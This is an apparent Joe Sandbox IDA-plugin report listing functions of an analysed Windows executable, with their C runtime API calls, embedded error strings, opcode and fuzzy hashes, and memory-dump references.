Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: memcpystrlen
String ID: basic_ios::clear$basic_string::_S_construct null not valid
API String ID: 3412268980-3371637893
Opcode ID: 773f8ec41fc6f52df4c1692ec68e264dbbd6adcc20a2fcd6b23503a71f5db28f
Instruction ID: d5294a2d73506c18404c665c9338a1f0eac5cfe1d26680cd33bb023a0a94f35a
Opcode Fuzzy Hash: 773f8ec41fc6f52df4c1692ec68e264dbbd6adcc20a2fcd6b23503a71f5db28f
Instruction Fuzzy Hash: 8A21E262A19EC280EA54BB2AA5451FDE394AB45BC0F8C4175FD5E8B79DEF2CD400C3A0

Function 00007FF75F958100 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00007FF75F95810B
strlen.MSVCRT ref: 00007FF75F958116
memcpy.MSVCRT ref: 00007FF75F95813F
setlocale.MSVCRT ref: 00007FF75F95814D

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: f1f5bd54c38461129c9c14ab153c0ff40cdcfcc6566ecebacef27458a949d6be
Instruction ID: 2918e095a0c9be657ad8546e96d8b6caad78fd32ffe49310db87f98836f8d38b
Opcode Fuzzy Hash: f1f5bd54c38461129c9c14ab153c0ff40cdcfcc6566ecebacef27458a949d6be
Instruction Fuzzy Hash: 69F08251B2978600FD19BB2719590FD82425F49BC0ACC8075EC0D5F3CADE2CF0424350

Function 00007FF75F8C0800 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF75F8C0809
_findclose.MSVCRT ref: 00007FF75F8C0828
free.MSVCRT ref: 00007FF75F8C0832
_errno.MSVCRT ref: 00007FF75F8C0840

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: _errno$_findclosefree
String ID:
API String ID: 1846143796-0
Opcode ID: 5cd88100a855528dbf6fc71cd214cf8d8278d3f0d3587e13402f125ce7c1bbcc
Instruction ID: afe71a13ed63ec1541f09739d6e4a07e8866c30a11b878ea643ee7c51b400c90
Opcode Fuzzy Hash: 5cd88100a855528dbf6fc71cd214cf8d8278d3f0d3587e13402f125ce7c1bbcc
Instruction Fuzzy Hash: 58E03022E1829246E9617E2558112E691408F44774FCD4770DE3C4F2C2DD2C6CA157E0

Function 00007FF75F9790E0 Relevance: 5.4, APIs: 4, Instructions: 364stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF75F979157
wcslen.MSVCRT ref: 00007FF75F9791F2
wcslen.MSVCRT ref: 00007FF75F979289
strlen.MSVCRT ref: 00007FF75F979321

Part of subcall function 00007FF75F8D67E0: memcpy.MSVCRT ref: 00007FF75F8D6815

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: wcslen$memcpystrlen
String ID:
API String ID: 3111578849-0
Opcode ID: 3e13eb9ff5378701ff35ac62cb92dcca55b73d8905621966c195c6389973b3f7
Instruction ID: 1a8d84b2158a68b7af2c463097dfb74ac9ef842d48662456296c53ca2921849d
Opcode Fuzzy Hash: 3e13eb9ff5378701ff35ac62cb92dcca55b73d8905621966c195c6389973b3f7
Instruction Fuzzy Hash: FAF15262719F8685DB50AF69E4401ADE361FB85BE4F880636EE5D877E9DF2CE400C320

Function 00007FF75F979940 Relevance: 5.4, APIs: 4, Instructions: 364stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF75F9799B7
wcslen.MSVCRT ref: 00007FF75F979A52
wcslen.MSVCRT ref: 00007FF75F979AE9
strlen.MSVCRT ref: 00007FF75F979B81

Part of subcall function 00007FF75F8D67E0: memcpy.MSVCRT ref: 00007FF75F8D6815

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: wcslen$memcpystrlen
String ID:
API String ID: 3111578849-0
Opcode ID: f3b2bc0e744dbaf009bdae409e5f4cde7982ddea07681dc902a01fbbe549e632
Instruction ID: 58a2bb3b5bd1cb3281f4021f68e6219068166b394f621639c0ae2a9da4258409
Opcode Fuzzy Hash: f3b2bc0e744dbaf009bdae409e5f4cde7982ddea07681dc902a01fbbe549e632
Instruction Fuzzy Hash: 3AF16062619FC685DB50AF69E4801ADE361FB85BE4F880532EE5D877E9DF6CE440C320

Function 00007FF75F978060 Relevance: 5.4, APIs: 4, Instructions: 351stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF75F9780D8

Part of subcall function 00007FF75F8D67E0: memcpy.MSVCRT ref: 00007FF75F8D6815

strlen.MSVCRT ref: 00007FF75F978160
strlen.MSVCRT ref: 00007FF75F9781E3
strlen.MSVCRT ref: 00007FF75F978267

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 37d2dfbbb759d6df7f8265c6c14d538c43e846403ee324bc105c37155cde724f
Instruction ID: c1092adae7a5e12f915935dc3ee91fdde19b2498d82f06265d78573229d2ea35
Opcode Fuzzy Hash: 37d2dfbbb759d6df7f8265c6c14d538c43e846403ee324bc105c37155cde724f
Instruction Fuzzy Hash: 82F1B066B09FC685DA50EB1AD4402EEA361FB85BD4F984532EE5D87799DF7CE400C320

Function 00007FF75F9788A0 Relevance: 5.4, APIs: 4, Instructions: 351stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF75F978918

Part of subcall function 00007FF75F8D67E0: memcpy.MSVCRT ref: 00007FF75F8D6815

strlen.MSVCRT ref: 00007FF75F9789A0
strlen.MSVCRT ref: 00007FF75F978A23
strlen.MSVCRT ref: 00007FF75F978AA7

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 4d91de09d6f7f0c78ef8df6a80a4fbd67d19c98723a62cb30ef7a99235b2e5cc
Instruction ID: 77e81d082d785988ce3301508553f6817029be3a2339ae44a375d34396be1117
Opcode Fuzzy Hash: 4d91de09d6f7f0c78ef8df6a80a4fbd67d19c98723a62cb30ef7a99235b2e5cc
Instruction Fuzzy Hash: D9F1B166A0AFCA85DA50EF1AD4401EEA361FB85BD4F984532EE5D87798DF3CE404C360

Function 00007FF75F8D5330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 00007FF75F8D537C
LocalFree.KERNEL32 ref: 00007FF75F8D53B4

Strings

basic_string: construction from null is not valid, xrefs: 00007FF75F8D5431

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: basic_string: construction from null is not valid
API String ID: 1427518018-2991274800
Opcode ID: ac24d2563818ce243d1681c24704f73b4898fbdea5b8404f9f28d57b1cbb316a
Instruction ID: 59b1eb1b0b336a41273a5a779d1b6cf077e4f2942753bd3f07524619e07e1105
Opcode Fuzzy Hash: ac24d2563818ce243d1681c24704f73b4898fbdea5b8404f9f28d57b1cbb316a
Instruction Fuzzy Hash: 4131B172A19F8181EB54AB25E4003EEA3A0EF41BC0FD84133DA4D8B798DF7CE4589710

Function 00007FF75F8CD1D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF75F8CD2A8

Strings

%p not found?!?!, xrefs: 00007FF75F8CD29E

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: fprintf
String ID: %p not found?!?!
API String ID: 383729395-11085004
Opcode ID: aa726d4ec39a1b03dee952394c738b9590541e00b5c2896a655777c3348429ee
Instruction ID: 0a694166266b4ffc468e11de6d412e243bae404dce15c30bbb36b68523321abb
Opcode Fuzzy Hash: aa726d4ec39a1b03dee952394c738b9590541e00b5c2896a655777c3348429ee
Instruction Fuzzy Hash: AD112422E4EB8281FA557F5595512F8D6919F45BC4F8C0435CD1D0F798DE2CF891A360

Function 00007FF75F8BE9F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF75F8BEA70

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF75F8BEA57
Unknown error, xrefs: 00007FF75F8BEADC

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 86296525dab937d97088590447f80607ab5b5172a7fd0f15c8811183563d59f3
Instruction ID: 78c2a5387d48c01303245cc08caead7773e9f26f5dd4465350cc9bc491b648b0
Opcode Fuzzy Hash: 86296525dab937d97088590447f80607ab5b5172a7fd0f15c8811183563d59f3
Instruction Fuzzy Hash: 8D01C262C1CFC482D2019F18D8011FAB330FBAE749F699325EBCC2A515DF29E592C700

Function 00007FF75F8BFDD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FF75F8BFE02
abort.MSVCRT ref: 00007FF75F8BFE17

Strings

CCG , xrefs: 00007FF75F8BFDFD

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: ExceptionRaiseabort
String ID: CCG
API String ID: 2956646853-1584390748
Opcode ID: 0e290a38f324416441cc4735ddf82908deb667d23209b74b4bf36d8904e48b31
Instruction ID: 13cd6530a313043fcded36563a6d97659d075fbbeff475b1be4b43ef0abe1b0a
Opcode Fuzzy Hash: 0e290a38f324416441cc4735ddf82908deb667d23209b74b4bf36d8904e48b31
Instruction Fuzzy Hash: 3B016762D24B8286E714AB5894413F96360FBF970CFB0A325E58C09175DF79D6F39640

Function 00007FF75F8C0A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF75F8C0A80
TerminateProcess.KERNEL32 ref: 00007FF75F8C0A8E

Strings

*** stack smashing detected ***: terminated, xrefs: 00007FF75F8C0A5F

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID: *** stack smashing detected ***: terminated
API String ID: 2429186680-3581952252
Opcode ID: f723e39cbaf28602d0cac3586fbf9f914b69b61a76cd9029937cc74dc0d97243
Instruction ID: 8170a0c2fbd39e2bb408689fb5c3d3bbb898ffe91378a08d1d696f8d53f5e4df
Opcode Fuzzy Hash: f723e39cbaf28602d0cac3586fbf9f914b69b61a76cd9029937cc74dc0d97243
Instruction Fuzzy Hash: D2E0C200F29A8286F6043BA1E8193F49222AF46381FEC0035C50E8F2E6CE1CAC069360

Function 00007FF75F8BEAB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF75F8BEA70

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF75F8BEA57
Overflow range error (OVERFLOW), xrefs: 00007FF75F8BEAB0

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: b8903fb8af9ac55113e2dd661c79fc65ca9ce30cda7416b04a9329fcad6584f1
Instruction ID: 4cebd06e543d764e4b72f2c54a2128fbe33593643c2165991b098e07e0544e8b
Opcode Fuzzy Hash: b8903fb8af9ac55113e2dd661c79fc65ca9ce30cda7416b04a9329fcad6584f1
Instruction Fuzzy Hash: 68F06256C19F8482D202AF1CA4000EBB330FF9D798F585325EFCD3A555DF29E5829710

Function 00007FF75F8BEAA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF75F8BEA70

Strings

Partial loss of significance (PLOSS), xrefs: 00007FF75F8BEAA0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF75F8BEA57

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: 285349a251c64339f04fc4c54c699bbe7271dbdd743e08541f3c43729369352d
Instruction ID: 51335d12980641d47f427618aad3830bb7cf6e3b5e77d20df302c894dd521037
Opcode Fuzzy Hash: 285349a251c64339f04fc4c54c699bbe7271dbdd743e08541f3c43729369352d
Instruction Fuzzy Hash: 55F04F56819E8482D202AF1CA4000EAB330FB9D788F589325EB8D3A555DF29E5929710

Function 00007FF75F8BEAD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF75F8BEA70

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF75F8BEA57
Total loss of significance (TLOSS), xrefs: 00007FF75F8BEAD0

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 729a26408af7f9b31892fe35bd8e0bda095de04b46c84ef09850f8b6fc79f211
Instruction ID: 01ce43cbbf6e89c1245a0a97099a9de4826104d332c5ed679a45cdadbddc34f7
Opcode Fuzzy Hash: 729a26408af7f9b31892fe35bd8e0bda095de04b46c84ef09850f8b6fc79f211
Instruction Fuzzy Hash: D2F04F56819E8482D202AF18A4000EAB330FB9D788F585325EB8D2A515DF29E5829710

Function 00007FF75F8BEAC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF75F8BEA70

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF75F8BEA57
The result is too small to be represented (UNDERFLOW), xrefs: 00007FF75F8BEAC0

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 3aca8553ef5ba559b2e9ff714939cfa1a15f87c4296170278ffcb4b13cfe5542
Instruction ID: a007e741259994c672a99b3f8e4b83a25e4de571bed2437bd997227de13c961f
Opcode Fuzzy Hash: 3aca8553ef5ba559b2e9ff714939cfa1a15f87c4296170278ffcb4b13cfe5542
Instruction Fuzzy Hash: 54F04F56819E8482D202AF18A4010EAB330FB9D788F589325EB8D2A555DF29E5829710

Function 00007FF75F8BEA90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF75F8BEA70

Strings

Argument domain error (DOMAIN), xrefs: 00007FF75F8BEA90
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF75F8BEA57

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 3f76d3b8eb91cbaab5872e0bdae80496e65db91be6cba9d8e2bcf6808cea8f07
Instruction ID: 69d0479272ee20d524e0afaf29a634b907e2f5a125b421e1d9ff6a6f87320969
